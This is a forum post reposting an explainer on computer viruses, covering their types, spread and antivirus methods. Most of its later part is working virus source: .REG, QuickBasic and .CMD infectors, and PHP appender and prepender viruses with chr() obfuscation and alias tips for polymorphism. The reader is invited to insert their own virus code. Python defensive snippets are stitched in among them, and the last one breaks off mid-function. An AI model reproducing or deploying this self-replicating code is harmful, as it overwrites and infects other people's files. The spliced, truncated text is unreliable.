How do viruses work??
Posted by Rolling on, 22nd September 2009, 20:25

Hello!

I found this document somewhere on the net in the past; now I'm going to share it here.

[How Do Viruses Work?]
A virus is, conceptually, a simple program. In its simplest form, a direct action virus can be modeled in terms of an algorithm like this:
begin
Look for (one or more infectable objects)
If (none found)
then
exit
else (infect object or objects).
endif
end

Direct action viruses don't remain in memory, but execute all their code at once and then hand control back to the host program.
Many viruses go memory resident (install themselves into memory) after the host program is executed, so that they can infect objects accessed after the infected application has been closed. The term hybrid is sometimes used for viruses that stay active as long as the host program is running. It is also (perhaps with more justification) applied to viruses that are both direct action and memory resident.
Some viruses, of course, do more than just replicate. We sometimes describe viruses as having up to three components: an infective routine, a payload, and a trigger. The previous models demonstrate an infective routine, although it could be said that finding an infectable object is the trigger for the infective routine. However, we more often think of the trigger as being the condition that has to exist before the payload (or warhead) can be executed. The payload can, in principle, be any operation that any other program can perform. In real life, however, it tends to be something flippant and irritating, like visual or audio effects, or else downright destructive. So now our model looks more like this:

begin
(Go resident)
if (infectable object exists)
then
if (object is not already infected)
then
(infect object)
endif
endif
if (trigger condition exists)
then
(deliver payload)
endif
end

The trigger condition might, for instance, be the execution of a file, or a particular date or time. The combination of a trigger and a malicious payload is sometimes called a logic bomb.
Viruses can be classified conveniently (but by no means definitively) into five main classes: Boot Sector Infectors (BSIs); file infectors; multipartite viruses; macro viruses; and scripting viruses. Memetic viruses (virus hoaxes and other chain letters) are not viruses in the same sense as the preceding classes because they infect people, not programs. They are considered here because hoax management is usually the responsibility of the person responsible for virus management.

[Boot Sector Infectors (BSIs)]
These PC-specific viruses infect the Master Boot Record and/or DOS Boot Record. At one time, these viruses accounted for the majority of reported incidents, but now they constitute a dwindling proportion of the total number of threats found in the wild, and new BSIs are something of a rarity. This might reflect the fact that people now increasingly use email and networks rather than floppy disks to exchange files. The fact that these are harder to write than macro viruses and scripting viruses (or even file viruses) is also relevant.

When a modern PC boots up, it goes through a process called Power On Self Test (POST). This stage of the boot process includes checking hardware components. Some of its information comes from information stored in CMOS, especially information relating to disk and memory type and configuration. If the CMOS settings don't match the actual drive geometry, the machine will not be able to find system areas and files where they should be, and will fail to finish the boot process.

The Master Boot Record (MBR), sometimes known as the Partition Sector, is found only on hard disks, where it is always the first physical sector. It contains essential information about the disk, giving the starting address of the partition(s) into which it is divided. On diskettes, which can't be partitioned and don't contain an MBR, the first physical sector is the boot record or DBR. On hard drives, the boot record is the first sector on a partition. The boot record contains a program whose job is to check that the disk is bootable and, if so, to hand over control to the operating system. By default, if there is a bootable floppy present, most PCs will boot from drive A, the first floppy drive, rather than from drive C, the first hard drive. This is actually an unfortunate default because this is the normal entry point for a boot sector virus.
If the PC attempts to boot from a floppy with an infected boot sector (even if the floppy doesn't contain the necessary files to load an operating system and therefore can't complete the boot process), the infected floppy will infect the hard drive. Characteristically (although not invariably), once the hard drive is infected, the virus will infect all write-enabled floppies. You might have heard that boot sector viruses can be disinfected without anti-virus software, using FDISK with a (largely) undocumented switch (/MBR), known in some quarters as FDISK/MUMBLE. The good news is that this works a lot of the time. The bad news is that, if you try it with the wrong virus, you can actually lose access to your data. Anti-virus software is a very imperfect technology, but it's almost invariably better and safer for removing viruses than general-purpose utilities that were never designed for that purpose. FDISK is not recommended as an anti-virus measure unless you know exactly what you're doing.
New boot sector viruses are comparatively rare. Nevertheless, even old favorites like Form still circulate among people who still exchange disks. Although reputable and up-to-date anti-virus software is still a must for detecting them, a simple precaution eliminates most of the risk of infection on most PCs, even from unknown BSIs. Most PCs, by default, will attempt to boot from drive A if there is a diskette there. If there isn't, it tries to boot from drive C. However, nearly all PCs can be reconfigured in CMOS to change this default. On most systems, this is done by modifying the boot order, so that the system always tries to boot from drive C first (or in the order CD drive, drive C, drive A). Other systems (notably some Compaq models) allow the setting of an option to disable booting from the floppy drive altogether. If the system user actually needs to boot from floppy, this simply involves resetting the option to default. Motherboard and PC system vendors use proprietary ways of setting CMOS options. Consult the documentation that came with your system. Note that "file and boot" (multipartite) viruses are less likely to be contained by this precaution.
[File Viruses (Parasitic Viruses)]
File viruses infect executable files. Historically, most file viruses have not been particularly successful in terms of their epidemiology (that is, at spreading). Many thousands have been written, but the number actually seen in the wild has been comparatively small compared to BSIs and, more recently, macro viruses. Nonetheless, those that have survived in the wild have often spread surprisingly well—CIH, for example. Some of the most prevalent contemporary file viruses, however, are more commonly described as worms. After a virus infects an executable file by direct attachment, that file, when executed, will infect other files. Fast infectors go for instant gratification. Each time the infection routine is executed, it infects a whole directory, all folders on the current path, a whole volume/disk, even all currently mounted volumes. Even file infectors that infect only one or two files at a time can spread quickly across systems and networks in a modern environment, where multiple binary executables are opened and closed many times over a single session. Every time you open an application, at least one executable file is loaded. Some applications will open several files at startup, whereas others periodically open multiple files when performing a particular operation. Binary executables are by no means restricted to .COM and .EXE files, but include DLLs (Dynamic Link Libraries), overlay files, VxDs and other classes of driver, and even certain screensaver and font files.
[Multipartite Viruses]
File and boot viruses are the most common example of multipartite viruses, viruses that use more than one infection mechanism. In this case, both boot-sectors and binary executable files might be infected and used as the means of disseminating the virus. However, it's likely that there will be an increase in multipartite viruses consisting of other combinations of virus types.
[Macro Viruses]
Macro viruses infect macro programming environments rather than specific operating systems and hardware. Microsoft Office applications are by far the most exploited environment. These can be regarded as a special case of file virus, in that they appear to infect data files rather than binary executables. However, this way of looking at the process might actually confuse the issue. Macros are essentially a means of modifying the application environment, rather than (or as well as) the data file. Indeed, in the case of Microsoft Office applications that support macro programming languages (Visual Basic for Applications and, in earlier versions, WordBasic and AccessBasic), the macro language cannot be unbound from the application's own command infrastructure. Macro viruses usually infect the global template, and often modify commands within the application's menu system. Macro viruses are particularly successful against Microsoft applications because they allow executable code (macros) to exist in the same file as data. Applications that segregate macros and data into different files are less susceptible to this kind of attack.
[Script Viruses]
Script is rather an imprecise term, but in this context normally (currently) refers to VBScript and other malware that can be embedded in HTML scripts and executed by HTML-aware email clients through the Windows Scripting Host. Many of the viruses that use this entry point are often better characterized as worms, and are therefore treated under that heading later in the chapter. VBScript and JScript are more virus friendly than JavaScript (for instance), primarily because they have many of the file I/O capabilities of other variations on the Visual Basic theme. Extant JavaScript malware usually takes advantage of an easily patched vulnerability in Internet Explorer.
[Memetic Viruses]
There is a further class of "viruses," which is unique, in that it comprises viruses that don't exist as computer code. The term meme seems to have been coined originally by Richard Dawkins, whose paper Viruses of the Mind draws on computer virology as well as on the natural sciences. A meme is a unit of cultural transmission, of replication by imitation, much as a gene is a unit of inheritance (a rather imprecise unit, perhaps). The memes we are most concerned with in this chapter are those sometimes known as metaviruses. A metavirus is itself a virus (what Dawkins calls a "virus of the mind, not a computer virus"), but purports to deal with other viruses (which are computer viruses). These viruses don't happen to exist. In other words, they are virus hoaxes. Virus hoaxes are not only a subclass of memes in general, but a subset of a particular type of meme, the chain letter. However, the virus hoax is particularly relevant to this chapter, because the administrator who manages virus incidents will usually also be the person who has to respond to plagues of virus hoaxes. The same might not be true of other hoaxes and chain letters.
[Spread of Viruses]

Although viruses have a history that dates back to the 1980s, their means of infection has changed over the years. Viruses depend on people to spread them. Viruses that can spread without human intervention are known as worms. Viruses require human activity such as booting a computer, executing an autorun on a CD, or opening an email attachment. There are three basic ways viruses propagate through the computer world:
1. Master boot record infection. This is the original method of attack. It works by attacking the master boot record of floppy disks or the hard drive. This was effective in the days when everyone passed around floppy disks.
2. File infection. A slightly newer form of virus that relies on the user to execute the file. Extensions, such as .com and .exe, are typically used. Some form of social engineering is normally used to get the user to execute the program. Techniques include renaming the program or trying to mask the .exe extension and make it appear as a graphic or .bmp.
3. Macro infection. The most modern type of virus began appearing in the 1990s. Macro viruses exploit scripting services installed on your computer. Most of you probably remember the I Love You virus, a prime example of a macro infector.
After your computer is infected, the computer virus can do any number of things. Some spread quickly. This type of virus is known as fast infection. Fast infection viruses infect any file that they are capable of infecting. Others limit the rate of infection. This type of activity is known as sparse infection. Sparse infection means that the virus takes its time in infecting other files or spreading its damage. This technique is used to help the virus avoid detection. Some viruses forgo a life of living exclusively in files and load themselves into RAM. These viruses are known as RAM resident. RAM resident infection is the only way that boot sector viruses can spread.
As the antivirus companies have developed better ways to detect viruses, writers have fought back by trying to develop viruses that are hard to detect. One such technique is to make a multipartite virus. A multipartite virus can use more than one propagation method. For example, the NATAS (Satan spelled backward) virus would infect boot sectors and program files. The idea is that this would give the virus added survivability. Another technique that virus developers have attempted is to make the virus polymorphic. Polymorphic viruses have the capability to change their signature every time they replicate and infect a new file. This technique makes it much harder for the antivirus program to detect it.
When is a virus not a virus? When is the virus just a hoax? As most people are somewhat worried about catching a computer virus, some unscrupulous individuals have discovered that a virus hoax can be as effective as an actual virus. A virus hoax is nothing more than a chain letter that encourages you to forward it to your friends to warn them of the impending doom. To convince readers to forward the hoax, the email will contain some official sounding information that sounds valid. Hoaxes can usually be recognized by three common items. First, the email claims that the virus is undetectable. Viruses change the contents of a drive and files and, as such, can be detected. Second, the email will alert you to warn everyone you know. Real viruses get plenty of news coverage. Third, many of the claims made in the email seem farfetched. Viruses are only pieces of code, and they have limits on what they can accomplish.
Viruses must place their payload somewhere. They can always overwrite a portion of the infected file, but to do so would destroy it. Most virus writers want to avoid detection for as long as possible and might not have written the program to immediately destroy files. One way the virus writer can accomplish this is to place the virus code either at the beginning or end of the infected file. Prependers infect programs by placing their viral code at the beginning of the infected file. Appenders infect files by placing their code at the end of the infected file. This leaves the file intact while the malicious code is added to the beginning or end of the file.
No matter what infection technique, all viruses have some basic common components. All viruses have a search routine and an infection routine. The search routine is responsible for locating new files, disk space, or RAM to infect. The search routine is useless if the virus doesn't have a way to take advantage of these findings. Therefore, the second component of a virus is an infection routine. This portion of the virus is responsible for copying the virus and attaching it to a suitable host. Most viruses don't stop here and also contain a payload. The purpose of the payload routine might be to erase the hard drive, displaying a message to the monitor, or possibly sending the virus to 50 people in your address book. Payloads are not required, but without it many people might never know that the virus even existed.
Many viruses might also have an anti-detection routine. Its goal is to help make the virus more stealth-like and avoid detection. Finally, there is the trigger routine. Its goal is to launch the payload at a given date and time. The trigger can be set to perform a given action at a given time. Some virus writers create virus code from scratch. That takes a certain amount of technical skill. A computer virus is no different from any other computer program. The developer must have some knowledge of C programming, Visual Basic, a macro language, or another programming language, such as assembly. Without those skills, it is still possible to create a computer virus, but a tool or existing virus is usually required. Virus writers can disassemble existing virus code and make subtle changes or download existing virus code.
[Virus Defense]
Prevention is better than a cure, and, as such, everything should be checked before being used. Many sites will provide an MD5sum with their programs to give users an easy way to tell that no changes have been made. Email attachments should also always be checked. In a high security controlled environment, a sheep dip system can even be used. This term originated from the practice of dipping sheep to make sure that they are clean and free of pests. A sheep dip computer can be used to screen suspect programs and connects to a network only under controlled conditions. It can be used to further examine suspected files, incoming messages, and attachments. Overall, the best way to prevent viruses is by following an easy five-point plan.
1. Install antivirus software.
2. Keep the virus definitions up-to-date. Dated antivirus is not much better than no protection at all.
3. Use common sense when dealing with attachments. If you don't know who it's from, or it looks suspicious, don't open it!
4. Keep the system patched. Many viruses exploit vulnerabilities that have previously been found and are well known.
5. Avoid attachments if possible or send them as a PDF.
There are other things you can do, such as not using Microsoft Outlook. Although that might not always be a viable option, just remember that most viruses target Outlook. Although virus prevention is good practice, there is still the possibility that your system might become infected with a virus. In general, the only way to protect your data from viruses is to maintain current copies of your data. Make sure that you perform regular system backups. A variety of tools are available to help with this task. Three types of backup methods exist including full, incremental, and differential.
Signature scanning antivirus programs work in a fashion similar to Intrusion Detection Systems (IDS) pattern matching systems. Signature scanning antivirus software looks at the beginning and end of executable files for known virus signatures. Signatures are nothing more than a series of bytes found in the virus's code. Here is an example of a virus signature:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
If you were to copy this into a text file and rename it as an executable, your antivirus should flag it as a virus. It is not actually a virus, and the code is harmless. It is just a tool developed by the European Institute of Computer Antivirus Research (EICAR) to test the functionality of antivirus software. Virus creators attempt to circumvent the signature process by making viruses polymorphic.
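An added example (not part of the original post) of how a signature scanner handles the EICAR test file: it applies the strict check the EICAR specification defines (string at the very start, only whitespace after it, at most 128 bytes) next to the looser "pattern anywhere in the file" match, and shows the page's point that changing a single byte of a fixed signature defeats it. The signature table, file names and sample contents are constructed; the test string is assembled from two halves so this source file does not itself carry the contiguous signature.

```python
import os
import tempfile

# The EICAR test string, split in two so that this source file itself does not
# contain the contiguous signature (a common precaution in test suites).
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$" + b"EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

# Constructed signature database: name -> byte pattern. A real scanner holds
# many thousands; the page's point is that a signature is just a run of bytes.
SIGNATURES = {"EICAR-Test-File": EICAR}


def is_eicar_file(data: bytes) -> bool:
    """Strict EICAR check as the EICAR specification defines it: the 68-byte
    string must open the file, anything after it may only be whitespace, and
    the whole file is at most 128 bytes."""
    if len(data) > 128 or not data.startswith(EICAR):
        return False
    return data[len(EICAR):].strip(b" \t\r\n") == b""


def scan_bytes(data: bytes) -> list:
    """Generic signature scan: report every known byte pattern found anywhere
    in the data (the looser check most scanners apply to arbitrary files)."""
    return [name for name, sig in SIGNATURES.items() if sig in data]


def scan_file(path: str) -> dict:
    with open(path, "rb") as fh:
        data = fh.read()
    return {"path": path, "eicar_strict": is_eicar_file(data), "signatures": scan_bytes(data)}


def demo() -> dict:
    """Write three constructed samples to a temp directory and scan them: the
    test file renamed to .com as the page describes, a copy with one byte
    changed (the 'polymorphic' case the page mentions), and a harmless text file."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        samples = {
            "eicar.com": EICAR + b"\r\n",
            "mutated.com": EICAR.replace(b"STANDARD", b"STANDARX"),  # one byte differs
            "readme.txt": b"Just some notes about antivirus testing.\n",
        }
        for name, content in samples.items():
            path = os.path.join(tmp, name)
            with open(path, "wb") as fh:
                fh.write(content)
            results[name] = scan_file(path)
    return results
```

The mutated sample passes both checks untouched, which is exactly why signature databases need constant updates and why heuristics and integrity checking exist alongside them.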
Heuristic scanning is another method that antivirus programs use. Software designed for this function examines computer files for irregular or unusual instructions. As an example, think of your word processing program; it probably creates, opens, or updates text files. If the word processor were to attempt to format the C: drive, this is something that heuristics would quickly identify, as that's not the usual activity of a word processor. In reality, antivirus vendors must strike a balance with heuristic scanning, as they don't want to produce too many false positives or false negatives. Many antivirus vendors use a scoring technique that will look at many types of behaviors. Only when the score exceeds a threshold will the antivirus actually flag an alert.
Integrity checking can also be used to scan for viruses. Integrity checking works by building a database of checksums or hashed values. These values are saved in a file. Periodically, new scans occur, and the results are compared to the stored results. Although it isn't effective for data files, this technique is useful for programs and applications, as the contents of executable files rarely change. For example, the MD5sum of Nmap 3.1 is d6579d0d904034d51b4985fa2764060e. Any change to the Nmap program would change this hashed value and make it easy for an integrity checker to detect.
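As an added example (not from the original document), an integrity checker in Python that baselines the digests of executable-type files, stores them as the page describes, and on a rescan reports files that were modified, added or removed. The directory layout and file contents are constructed, and SHA-256 is used in place of the page's MD5 because MD5 collisions are practical today.

```python
import hashlib
import json
import os
import tempfile

# Extensions the page calls out as binary executables whose contents rarely change.
EXECUTABLE_EXTS = {".exe", ".com", ".dll", ".sys", ".scr", ".ovl", ".vxd"}


def file_digest(path: str, algo: str = "sha256") -> str:
    """Hash a file in chunks; pass algo='md5' to reproduce the page's MD5sum style."""
    h = hashlib.new(algo)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: str, algo: str = "sha256") -> dict:
    """Walk a directory and record the digest of every executable-type file,
    keyed by its path relative to root (always with forward slashes)."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in EXECUTABLE_EXTS:
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                baseline[rel] = file_digest(full, algo)
    return baseline


def compare(baseline: dict, current: dict) -> dict:
    """Report files whose digest changed, files that appeared, and files that vanished."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "missing": sorted(p for p in baseline if p not in current),
    }


def demo() -> dict:
    """Constructed scenario: baseline a fake program directory, then simulate an
    appender-style change to one binary plus a newly dropped DLL, while an edited
    data file is (correctly) ignored."""
    with tempfile.TemporaryDirectory() as root:
        def write(rel, data):
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(data)

        write("app/main.exe", b"MZ" + b"\x00" * 64)
        write("app/helper.dll", b"MZ" + b"\x01" * 64)
        write("app/notes.txt", b"not an executable, ignored by the checker")
        stored = json.dumps(build_baseline(root))  # what the page calls "saved in a file"

        # Simulate infection: bytes appended to main.exe, a new DLL dropped.
        with open(os.path.join(root, "app/main.exe"), "ab") as fh:
            fh.write(b"APPENDED-BYTES")
        write("app/dropped.dll", b"MZ" + b"\x02" * 16)
        write("app/notes.txt", b"edited notes")  # data file edit must not alert

        report = compare(json.loads(stored), build_baseline(root))
    return report
```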
Activity blockers can also be used by antivirus programs. An activity blocker intercepts a virus when it starts to execute and blocks it from infecting other programs or data.
[File type virus]
REG Files
Every .REG file writes keys to the Registry when it is executed. Many viruses use this to start themselves at every boot of the computer.
But is it possible to infect a .REG file with its own REG-infector virus? The answer is yes, because the registry is able to execute DOS commands. Here is code from a WinREG virus:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
@="command /c for %i in (%windir%\\system\\*.reg) do regedit /e %i HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
How does this virus work? It writes a key to the start-up (Run) registry key, so the command is executed at every start of the computer. The command searches for every .REG file in the Windows system folder and overwrites each one with an export of the registry path named there. That path is the virus itself, so every .REG file is overwritten with the virus. This virus won't spread much, because nobody copies .REG files around. But it shows that .REG files can be infected. ;-)
Source-code Files
These files are, for instance, .CPP files (C++), .PAS (Pascal) or .BAS (QuickBasic).
I have written a source code infector, because I didn't know that it was possible to do:
CLS
REM The first Quick Basic infection Virus
REM written by SeCoNd PaRt To HeLl
REM for showing, that .BAS can be infected
REM NAME of the Virus: BAS.XYC
OPEN "C:\xyc.bat" FOR OUTPUT AS #1
PRINT #1, "@echo off"
PRINT #1, "if exist xyc.bas copy xyc.bas C:\xyc.bas"
PRINT #1, "for %%r in (*.bas ..\*.bas %windir%\*.bas) do copy C:\xyc.bas %%r"
CLOSE #1
SHELL "C:\xyc.bat"
This virus infects only QuickBasic source codes. If the infected source is executed, it creates a file named XYC.BAT in the path C:\. This file is then executed by the virus. If a file named xyc.bas exists, the batch file copies it to the path C:\xyc.bas. Then it searches for every .BAS file in the current, parent and Windows directories and copies the virus (C:\xyc.bas) over them. If any infected file is executed, the virus will infect other files too, because the file xyc.bas was not deleted. This virus won't spread often, because the virus can only overwrite files if the file xyc.bas is on the PC.

HTM(L) Files
HTML files can be infected. The reason is that .HTM or .HTML files can execute scripts like Visual Basic Script or JavaScript. Here is a little piece of the source of an .html virus:

<html>
<body>
<script language="VBScript">
. . . Script Code . . .
</script>
</body>
</html>
Because of that, .HTM files are able to spread via Outlook emails or IRC (mIRC, pIRCh, vIRC, KvIRC…).

INI Files
I don't really know about it, but I think it must be possible. If any program executes an infected .INI file, the .INI file could copy itself to the WIN.INI or SYSTEM.INI file, so that it is loaded at every start of the computer. Then it could search for all .INI files on the computer and overwrite them with itself. If any program which uses an infected .INI file is copied to another computer, the virus could spread. But I think it is more work than success…

SYS files
It's the same as with .INI files, because .SYS files can't be executed by the user.
The virus must infect the CONFIG.SYS file, then try to infect other .SYS files, and if any program which uses an infected .SYS file is copied, the virus can spread to other computers.

.TXT files
No, it's not possible to write a .TXT file virus. But if you write an .EXE virus, you can infect the NOTEPAD.EXE file, so the virus will start whenever a .TXT file is opened. But this isn't really a text file virus.
[PHP Viruses]
[Changing virus to ASCII]
Converting the whole virus into character codes should not be a big problem. Write the virus code (expressed as chr() calls) to a new file, run the file via 'include()', and delete it.

<?php
$content=chr(60).chr(63).chr(112).chr(104).chr(112).chr(13).chr(10).chr(112).chr(114).chr(105).
chr(110).chr(116).chr(40).chr(34).chr(72).chr(105).chr(32).chr(86).chr(88).chr(101).
chr(114).chr(33).chr(32).chr(84).chr(104).chr(105).chr(115).chr(32).chr(105).chr(115).
chr(32).chr(106).chr(117).chr(115).chr(116).chr(32).chr(97).chr(32).chr(115).chr(105).
chr(108).chr(108).chr(121).chr(32).chr(116).chr(101).chr(115).chr(116).chr(32).chr(115).
chr(116).chr(114).chr(105).chr(110).chr(103).chr(32).chr(102).chr(111).chr(114).chr(32).
chr(116).chr(104).chr(101).chr(32).chr(101).chr(110).chr(99).chr(114).chr(121).chr(112).
chr(116).chr(105).chr(111).chr(110).chr(32).chr(105).chr(110).chr(32).chr(80).chr(72).
chr(80).chr(46).chr(34).chr(41).chr(59).chr(13).chr(10).chr(63).chr(62);
copy(__FILE__,'file.php');
$a=fopen('file.php','w+');
fwrite($a, $content);
fclose($a);
include('file.php');
unlink('file.php');
?>

You should understand the principle of the code quickly. The encoded code contains a 'secret' message.
'$content' contains a PHP script in chr() form; here you would put your own virus code. Just convert the normal letters to their character codes and add them to a variable. Since the encoded data has to be a fully working file, you have to include '<?php', '?>' and the whole PHP syntax (for instance semicolons).
Makes a new file (because I couldn't find a command to create a file, I copy '__FILE__' and overwrite it).
Writes the encoded content to the file (but now: decoded!)
Opens the file (via 'include(<-file->)')
Deletes the file (via 'unlink(<-file->)')

Changing the commands
Maybe you already know it, but PHP contains tons of aliases for different commands, and we can use that. I'm sure you know how: just replace one command with another that does the same thing. I made a list of commands and their aliases to show you how much we are able to change. This is just a short list; nevertheless it could be useful when you want to make such a polymorphic virus.
-----------------------------------------------------------------------
chop - rtrim()
close - closedir()
die - exit()
dir - getdir()
doubleval - floatval()
fputs - fwrite()
ini_alter - ini_set()
is_double - is_float()
is_integer - is_int()
is_long - is_int()
is_real - is_float()
is_writeable - is_writable()
join - implode()
magic_quotes_runtime - set_magic_quotes_runtime()
pos - current()
rewind - rewinddir()
show_source - highlight_file()
sizeof - count()
strchr - strstr()
Full list of aliases here: http://zend.com/phpfunc/all_aliases.php
-------------------------------------------------------------------------
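As an added example (not part of the original document), a Python helper that undoes both tricks above from the defender's side: it decodes chr()-chains back to text and rewrites aliased function names to their canonical form, so that a signature or a manual review sees the calls the file actually makes rather than the spelling the author chose. The sample PHP fragment, the list of self-writing calls and the alias table (only those entries of the page's list that are real PHP aliases) are constructed.

```python
import re

# Aliases from the page's list that are certainly aliases in PHP, mapped to the
# canonical name so that one signature matches every spelling.
PHP_ALIASES = {
    "chop": "rtrim", "die": "exit", "doubleval": "floatval", "fputs": "fwrite",
    "ini_alter": "ini_set", "is_double": "is_float", "is_integer": "is_int",
    "is_long": "is_int", "is_real": "is_float", "is_writeable": "is_writable",
    "join": "implode", "pos": "current", "show_source": "highlight_file",
    "sizeof": "count", "strchr": "strstr",
}

# A run of chr(N) calls joined by '.', the obfuscation the page demonstrates.
_CHR_CHAIN = re.compile(r"chr\(\s*\d+\s*\)(?:\s*\.\s*chr\(\s*\d+\s*\))*")
_CHR_NUM = re.compile(r"chr\(\s*(\d+)\s*\)")
_CALL = re.compile(r"\b([A-Za-z_]\w*)\s*(?=\()")

# Calls that, taken together, mark the write-then-include-then-delete pattern.
SELF_WRITING_CALLS = {"fwrite", "include", "unlink", "copy", "file_put_contents", "eval"}


def decode_chr_chains(php_src: str) -> list:
    """Return every chr()-chain in the source decoded to text
    (PHP's chr() reduces values outside 0..255 modulo 256)."""
    out = []
    for m in _CHR_CHAIN.finditer(php_src):
        nums = [int(n) % 256 for n in _CHR_NUM.findall(m.group(0))]
        out.append(bytes(nums).decode("latin-1"))
    return out


def normalize_aliases(php_src: str) -> str:
    """Rewrite aliased function names to their canonical form before matching."""
    return _CALL.sub(lambda m: PHP_ALIASES.get(m.group(1).lower(), m.group(1)), php_src)


def analyze(php_src: str) -> dict:
    """Normalize aliases, decode hidden strings and report which self-writing
    calls appear, so an analyst sees the file as it behaves, not as it is spelled."""
    normalized = normalize_aliases(php_src)
    calls = {c.lower() for c in _CALL.findall(normalized)}
    return {
        "decoded_strings": decode_chr_chains(normalized),
        "self_writing_calls": sorted(calls & SELF_WRITING_CALLS),
        "normalized": normalized,
    }


# Constructed sample in the style of the page: a chr()-encoded PHP fragment
# written to disk through the 'fputs' alias, then included and deleted.
SAMPLE_PHP = """<?php
$content=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(99).chr(104).chr(111)
 .chr(32).chr(49).chr(59).chr(32).chr(63).chr(62);
$a=fopen('file.php','w+');
fputs($a, $content);
fclose($a);
include('file.php');
unlink('file.php');
?>
"""
```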
CMD infection
CMD = Batch for WinNT/2000/XP = DOS. And as you know, you are NOT allowed to use any '>', '<' or '&' in a DOS string. Use character codes in every string instead of the real signs. A few problems remain: the beginning and the end of the PHP code, where we MUST write '<' or '>'. Solution: use a JavaScript file to write the first and the last line to the .htm file. A script is needed anyway for starting Internet Explorer (to run the PHP code, since DOS can't open an Internet browser), so I used that file.
The result of the code is the following file.

<?php
$string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
$string=strtok(chr(13).chr(10));
$cmdcode='cls'.chr(13).chr(10).'@echo off'.chr(13).chr(10).'del index.html'.chr(13).chr(10);
while ($string{0}!='?')
{
$cmdcode.='echo '.$string.chr(62).chr(62).'index.html'.chr(13).chr(10);
$string=strtok(chr(13).chr(10));
}
$cmdcode.='echo var fso=WScript.CreateObject("Scripting.FileSystemObject");'.chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo var shell=WScript.CreateObject("WScript.Shell");'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo all=fso.OpenTextFile("index.html").ReadAll();'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo a=fso.OpenTextFile("index.html",2);'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo a.Write(String.fromCharCode(60,63,112,104,112,13,10)+all+String.fromCharCode(13,10,63,62));'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo a.Close();'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo shell.Run("index.html");'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='cscript file.js';
$directory=opendir('.');
while ($file = readdir($directory))
{
if (strstr($file, '.cmd'))
{
fwrite(fopen($file, 'w'), $cmdcode);
}
}
closedir($directory);
?>

- Reads the whole file content (the virus) and splits it into lines
- Makes the .CMD code, which doesn't contain any '>', '<' or '&'
- Adds JavaScript code to the .CMD code, so the first and the last lines ('<?php' and '?>') are added to the new .htm file
- Adds code to the .CMD code which runs Internet Explorer
- Overwrites every .CMD file in the current directory with the CMD code.
Appending
An appender is a virus which copies itself after the victim file. It's really easy to make one. You just have to search for the last PHP part (or just put an infection mark at the beginning of the virus). Then you read till the end, and you have your virus file. The rest should be clear: search for a victim, check that it is not infected, and copy the virus body to the end of the file. I made an example for that, as you might think. The exact explanation is at the end, after the code.

<?php // SPTH
$string='<?php // '.strstr(fread(fopen(__FILE__,'r'), filesize(__FILE__)), 'SPTH');
$curdir=opendir('.');
while ($file = readdir($curdir))
{
if (strstr($file, '.php'))
{
$victim=fopen($file, 'r+');
if (!strstr(fread($victim, filesize($file)), 'SPTH'))
{
fwrite($victim, $string);
}
fclose($victim);
}
}
closedir($curdir);
?>

Opens the infected file and saves the virus body (searching for 'SPTH' and saving the rest of the file)
Searches for every PHP file in the current directory.
Checks that it is not infected (searches for the infection mark 'SPTH' anywhere in the file; if not found: not infected)
Copies the virus body to the file

Prepending
A prepender copies its code in front of the victim's code, therefore it will be executed before the victim. That's the main idea of this kind of infection. But there are some other important things you have to note: to get the virus out of the file, you need some information about where the virus is. In the example the virus uses the first 391 bytes. The next important thing is that you must not infect a file twice. What to do against that? Check if the file is already infected. In the following example the virus searches the first 13 bytes (in an infected file this is the code '<?php // SPTH') for
'SPTH'. If found, the file won't be infected. Now let's look at the PHP Prepender Virus example:

<?php // SPTH
$string=fread(fopen(__FILE__,'r'), 391);
$curdir=opendir('.');
while ($file = readdir($curdir))
{
if (strstr($file, '.php'))
{
$victim=fopen($file, 'r+');
if (!strstr(fread($victim, 13), 'SPTH'))
{
rewind($victim);
fwrite($victim, $string.fread($victim, filesize($file));
}
fclose($victim);
}
}
closedir($curdir);
?>

Reads the first 391 bytes (which is exactly the virus size)
Searches for every .PHP file in the current directory
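An added example (not part of the original document) covering both the appender and the prepender above from the defender's side: a scanner that classifies .php files by where the '<?php // SPTH' infection mark sits, and a disinfector that strips the virus body (everything from the marker to the end for an appended body; the marker up to its own closing '?>' for a prepended one, so the fixed 391-byte size is not assumed). The host file and the inert stand-in body are constructed; the stand-in carries only the marker and a comment, not the page's code.

```python
import os
import tempfile

MARKER = "<?php // SPTH"   # the infection mark both examples on the page use
END_TAG = "?>"


def classify(content: str) -> str:
    """'prepended' if the marker opens the file, 'appended' if it appears later,
    'clean' if it is absent."""
    idx = content.find(MARKER)
    if idx < 0:
        return "clean"
    return "prepended" if idx == 0 else "appended"


def disinfect(content: str) -> str:
    """Remove the virus body. A prepender's body runs from the marker to its own
    first '?>' (the host's code follows); an appender's body is everything from
    the marker to the end of the file."""
    kind = classify(content)
    if kind == "clean":
        return content
    if kind == "appended":
        return content[:content.find(MARKER)].rstrip("\r\n") + "\n"
    end = content.find(END_TAG, len(MARKER))
    if end < 0:
        raise ValueError("prepended marker without closing tag; refusing to guess")
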